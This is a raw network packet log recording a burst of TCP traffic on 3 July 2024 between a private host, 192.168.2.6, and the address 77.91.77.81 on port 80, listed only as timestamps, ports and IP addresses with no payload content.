Jul 3, 2024 18:09:06.600903034 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.600985050 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.600996971 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.601008892 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.601018906 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.601021051 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.601032972 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.601042032 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.601046085 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.601058960 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.601059914 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.601090908 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.601102114 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.602165937 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.602175951 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.602252007 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.602267981 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.602278948 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.602291107 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.602344036 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.602368116 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.602380991 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.602392912 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.602407932 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.602436066 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.646128893 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.646157026 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.646167994 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.646187067 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.646209002 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.646214962 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.646266937 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.646277905 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.646289110 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.646301031 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.646306992 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.646320105 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.646348953 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.667733908 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.667773962 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.667784929 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.667793989 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.667813063 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.667821884 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.667910099 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.667927027 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.667938948 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.667949915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.667959929 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.667960882 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.667970896 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668004036 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668042898 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668088913 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668127060 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668139935 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668167114 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668180943 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668263912 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668276072 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668287039 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668301105 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668319941 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668339014 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668478012 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668495893 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668513060 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668525934 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668531895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668544054 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668554068 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668555975 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668562889 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668570042 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668581009 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668581963 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668591976 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668593884 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668618917 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668646097 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668775082 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668787956 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668803930 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668814898 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668816090 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668828964 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668834925 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668847084 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668849945 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668859959 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668872118 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668876886 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668885946 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.668903112 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.668926001 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.669230938 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669275999 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.669440031 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669457912 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669461966 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669467926 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669472933 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669478893 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669568062 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669579029 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669584990 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.669591904 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669610977 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669615984 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.669624090 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669632912 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.669636965 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669648886 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669660091 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669661045 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.669672012 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669682980 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669687033 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.669694901 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669707060 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669709921 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.669718027 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669729948 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669733047 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.669740915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669749975 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.669754982 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669766903 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669779062 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.669784069 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.669804096 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.669832945 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.670149088 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670161009 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670197964 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.670316935 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670329094 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670340061 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670351028 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670356989 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670358896 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.670362949 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670373917 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670382023 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.670384884 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670392036 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.670398951 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670409918 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670420885 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.670423985 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670437098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670449018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.670455933 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.670466900 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.670494080 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.690684080 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.690742016 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.690753937 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.690763950 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.690819979 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.690851927 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.690862894 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.690874100 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.690886974 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.690896988 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.690910101 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.690937996 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.691112995 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691126108 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691174984 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691185951 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691191912 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.691198111 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691210985 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691212893 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.691221952 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691242933 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.691267967 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.691344976 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691355944 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691361904 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691366911 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691376925 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691392899 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691396952 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.691416025 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.691438913 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.691634893 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691647053 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691658020 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691668034 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691677094 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691689014 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691689968 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.691694975 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691705942 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691713095 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.691718102 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.691732883 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.691761971 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.691778898 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.692929029 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.692976952 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.693002939 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.693012953 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.693047047 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.693074942 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.693088055 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.693099022 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.693119049 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.693124056 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.693142891 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.693166971 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.693190098 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.693233967 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.737106085 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.737117052 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.737123966 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.737129927 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.737216949 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.737230062 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.737243891 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.737256050 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.737297058 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.737297058 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.737319946 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.737354040 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.758446932 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.758481026 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.758491039 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.758606911 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.758622885 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.758639097 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.758651018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.758661985 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.758670092 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.758699894 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.758721113 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.758755922 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.758764982 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.758785009 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.758799076 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.758838892 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.758872032 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.758883953 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.758893967 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.758914948 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.758939981 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.759020090 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759032011 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759043932 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759053946 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759066105 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759071112 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.759077072 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759093046 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.759118080 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.759316921 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759363890 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.759507895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759521008 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759530067 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759541035 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759552956 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.759557962 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759577990 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.759603024 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.759694099 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759706974 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759717941 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759740114 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.759762049 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.759854078 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759865999 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759880066 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759890079 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759897947 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.759902954 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759912968 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.759913921 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.759939909 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.759958982 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760035992 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760055065 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760066032 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760073900 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760077000 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760087013 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760090113 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760102987 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760107040 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760113955 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760123968 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760126114 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760137081 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760149002 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760157108 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760160923 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760173082 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760183096 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760183096 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760198116 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760200024 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760230064 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760258913 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760406971 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760417938 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760428905 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760440111 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760451078 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760473967 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760473967 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760503054 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760514021 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760515928 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760528088 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760539055 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760544062 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760549068 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760561943 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760564089 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760572910 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760585070 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760587931 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760601997 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760627985 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760790110 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760835886 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:06.760983944 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.760996103 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.761007071 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.761018038 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:06.761027098 CEST	80	62923	77.91.77.81	192.168.2.6
